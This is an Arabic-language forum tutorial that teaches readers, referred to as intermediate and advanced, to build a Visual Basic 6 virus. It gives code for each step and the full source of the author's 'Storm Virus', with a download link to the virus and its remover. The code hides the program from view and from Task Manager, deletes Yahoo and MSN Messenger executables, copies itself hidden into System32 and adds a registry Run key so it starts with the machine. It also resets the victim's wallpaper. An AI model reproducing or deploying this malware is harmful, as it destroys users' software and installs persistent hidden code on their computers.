مشروع صناعة فيروس بالغة الفيجول بيسك
بسم الله الرحمن الرحيم
مـــنــتــديـــات العـــــــــــــــاصفـــــــــــة / قسم الفيجول بيسك
مـــــــــشروع صنـــاعــة فـــيروس بالغة الفيـــــجول بيــــــــــسك
السلام عليكم..
أتمنى إن يكون الجميع بصحة جيدة بعد غيابي عن المنتدى قررت إن أقوم بمشروع خاص بصناعة الفيروسات و لكن هذه المرة باستخدام لغة الفيجول بيسك و سوف نتعلم اليوم كيف صناعة فيروس قوي و بمواصفات جيدة إن شاء الله ينال إعجابكم و إي استفسار أو سؤال أنا جاهز للاجابة إن شاء الله إذن فل نبدأ على بركة الله...
طبعاً قبل البدأ اود ان اقول ان رأيت عناوين مواضيع جديدة في قسم الفيجول بيسك اود ان اشكر في هذا الموضوع جميع من يساهم في تطوير و تجميل هذا القسم و جميع الاقسام ...
المواصفات:
1.التشغيل عند بدأ تشغيل الحاسوب
2.إخفاء الفيروس عند التشغيل أي يصبح Hidden
3.حذف نفسه من قائمة Task Manager إي عند الضغط على (alt+ctrl+delete) لا يظهر
4.تدمير الملفات و البرامج (في مثالنا هذا سوف نقوم بتدمير كل من برنامج Yahoo و MSN )
5.نسخ الفيروس نفسه في عدة اماكن من اجل ضمان عدم حذفه من الجهاز بكل سهولة او بأستخدام امر Format
6.من اجل اضافة مميزة سوف نقوم بوضع امر تغير خلفية سطح المكتب الخاص بالضحية (له ثوابته سوف نتحدث عنه لاحقاً)
7.استخدم عبارات التكرار من اجل تدمير الجهاز إذ أردنا بأصوات من الحاسوب
اخواني الاعزاء اود ان اقول ان هذا الدرس ليس للمبتدئين .. بل للمتوسط و محترف فقط !!
الان نحتاج الى Form & Modue فقط.
سوف اعطي كل كود و سببه و اين يوضع ... |82|
كود الاخفاء .. اي عند تشغيل الفيروس لا يظهر للضحية اي شيء :
كود:
Me.Hide
او ممكن من لوحة الخصائص Properties نذهب الى الخاصية visible و نحول القيمة الخاصة به من True الى False ..
الان فل ننتقل الى كيفية اخفاء الفيروس عن Task Manager ...
طبعاً اريد ان اوضح شيء مهم . بعض الاشخاص يقولون ان هذا الكود غير فعال لكن هذا الكود في الحقيقة هو فعال و سوف اوضح ذالك .. الان اضغط على ثلاث ازرار في نفس الوقت هي Alt+Ctrl+Delete سوف يظهر لديك نافذة Task Manager .
(الان ... يوجد اربعة نوافذ ما يهمنا الان هما الاول Applications و الثانية Processes ان عمل الكود هو اخفاء الفيروس من النافذة الاول اي Applications اما عن الثانية سوق يكون موجود و يمكن حذفه . و لكن يوجد حل جيد من اجل ضمان عدم حذفه .. و هو تغير اسم الفيروس الى اسم خاص بالنظام و هكذا لا اعتقد ان الضحية سوف يمحسه .)
الان فل نكتب الكود الذي نتحدث عنه أي اخفاء الفيروس من Task Manager
كود:
App.TaskVisible = False
تغير خلفية سطح المكتب ...
قم بوضع هذا الكود في Module :
كود:
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Const SPI_SETDESKWALLPAPER = 20
هذا من اجل تعريف المتغيرات الخاصة بهذه العملية و استخدام الدوال التي تعمل على التنفيذ ...
ثم قم بوضع هذا الكود في المكان المناسب أي لوحة العمل :
كود:
Dim lngSuccess As Long
Dim strBitmapImage As String
strBitmapImage = "C:\WINDOWS\pchealth\helpctr\System\Remote Assistance\Interaction\Server\StopControl.bmp"
lngSuccess = SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, strBitmapImage, 0)
يمكنك وضع الامتداد الخاص بالصورة بدل الامتداد لكن طبعاً يجب ان يكون امتداد الصورة موجود لديه او وضع الصورة مع الفيروس و من ثم اختصار الامتداد الى الملف .
اريد ان اوضح ان هذا الكود يتعامل فقط مع صور من نوع Bitmap اي ذات الامتداد bmp
الان الكودات الخاصة بحذف كل من yahoo و msn نبدا بـ yahoo :
كود:
Open "C:\Program Files\Yahoo!\Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\Yahoo!\Messenger\*.EXE")
Exit Sub
في السطر الاول نتأكد من ان البرنامج موجود اما الاخر فهو امر kill من اجل حذفه ... و نفس الشيء مع msn لكن فقط تغير امتداد ...
كود:
Open "C:\Program Files\MSN Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\MSN Messenger\*.EXE")
Exit Sub
كود النسخ ..بأستخدام الامر file copy ...
كود:
FileCopy (App.Path & "\name_virus.exe"), ("C:\Windows\System32\Storm Virus.exe")
في هذا الكود سوف يقوم بنسخ الفيروس في ملف SYSTEm 32 في مجلد ويندوز و يمكنك تكرار الكود و تغير الامتداد الى عدة مناطق في الحاسب .
كود الاخفاء : اي يصبح الفيروس مخفي نقوم بتحويل قيمته الى Hidden
كود:
SetAttr "C:\Windows\System32\name_virus.exe", vbHidden
و سوف اضيف كود اخر لجعل الفيروس ReadOnly
SetAttr "C:\Windows\System32\name_virus.exe", vbReadOnly
الان التشغيل عند بدا التشغيل .......
ضع هذا الكود في الموديل :
كود:
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM = &H80000002
Dim hKey As Long
Dim Ret As Long
Public Sub RunWhenStartup(ProgramName As String, ProgramPath As String)
Dim hKey As Long
Dim Ret As Long
Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey)
Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1)
RegCloseKey hKey
End Sub
الان ضع هذا الكود في الفورم لتشغيل الفيروس :
كود:
RunWhenStartup "virus name", App.Path & "\" & App.EXEName & ".exe"
الان هذا فيروس متكامل و لكن نستطيع وضع خاصية قوية جدا جدا و 9هي التكرار فقط اضف lable و ضع هذا الكود في الفورم :
كود:
lable1.Caption = “0”
While Score.Caption < 10
Beep
Wend
...................................
معالجة الاخطاء .
ربما يحدث خطاء اثناء عملك لهذا قم بوضع معالج اخطاء و هذا بسيط ضع هذا الكود في بداية الفورم اقصد اول كود قبل اي كود :
كود:
Private Sub ErrorRepair()
On Error Resume Next
End Sub
و من ثم ضع بعد كل كود Call ErrorRepair من اجل ضمان عدم حدوث اخطاء .
اخيراً اتمنى ان ينال رضاكم الدرس و اعذروني لان الدرس ليس منسق بشكل جيد و لا يوجد صور و السبب ان هذا المشروع قد اعددته منذوا مده و احببت ان اضعه و بسبب ضيق الوقت لدي اما الان سوف اضع لكم الفيروس الذي انا صنعته و سميته Storm Virus مع مضاد له اي اذ شغلت الفيروس سوف يوقفه عن العمل و سوف اضع مواصفات الفيروس......
Storm Virus
1.التشغيل عند بدا تشغيل الجهاز
2.يحذف كل من برنامجي الياهو و msn
3.يغير خلفية سطح المكتب و حتى اذ غيرته سوف تعود
4.مخفي عند التغشيل
5.مخفي من قائمة alt+ctrl+del
6.الحجم : 24.0 KB
و اود ان اقول ان هذا الفيروس لا يحوي على اي اخطاء لاني ابقيته تحت التجربة و الحمد لله فعال و قوي .. و يوجد ايضاً مضاد له سوف ارفقه اسمه Anti Storm Virus ...
سوف يكون في المرفقات الفيروس Storm Virus و المضاد الخاص به .
|579|
على فكرة ممكن اتضيفون بعض الكودات و موجود موايع مثل مكتبة الاكواد ..
اخيراُ احب ان اهدي هذا الدرس الى اخي العزيز RAAD خاصة و كل اعضاء منتدى العاصفة...و اعذروني على اي خطا و اي سؤال انا حاظر لكن المشكلة ليس لدي وقت كثير سوف احاول القدوم في يوم اخر ان شاء و لكن ممكن اي شخص من الاعضاء اذ كان يملك الاجابة اتمنى ان يساعدكم و الاخ الصقر الجارح ان شاء الله ما يقصر و الان هذا كود الفيروس الذي انا صنعته كامل :
في الفورم :
كود:
Private Sub ErrorRepair()
On Error Resume Next
End Sub
Private Sub Form_Load()
Call ErrorRepair
Dim lngSuccess As Long
Dim strBitmapImage As String
strBitmapImage = "C:\WINDOWS\pchealth\helpctr\System\Remote Assistance\Interaction\Server\StopControl.bmp"
lngSuccess = SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, strBitmapImage, 0)
Me.Hide
App.TaskVisible = False
'Yahoo File
On Error GoTo Error:
Open "C:\Program Files\Yahoo!\Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\Yahoo!\Messenger\*.EXE")
Exit Sub
'MSN Messenger File
On Error GoTo Error:
Open "C:\Program Files\MSN Messenger\*.EXE" For Input As #1
Close
Call Kill("C:\Program Files\MSN Messenger\*.EXE")
Exit Sub
Error:
Call ErrorRepair
RunWhenStartup "Virus Storm", App.Path & "\" & App.EXEName & ".exe"
End Sub
في الموديل :
كود:
Option Explicit
Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Const SPI_SETDESKWALLPAPER = 20
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE = KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM = &H80000002
Public Sub RunWhenStartup(ProgramName As String, ProgramPath As String)
Dim hKey As Long
Dim Ret As Long
Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey)
Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1)
RegCloseKey hKey
End Sub
للتحميل الفيروس و المضاد اضغط هنا ...http://3ssom.com/uploader/uploads14/...122::122::122:
l,q,u r]dl ihl []h gghuqhx hg[]] lefj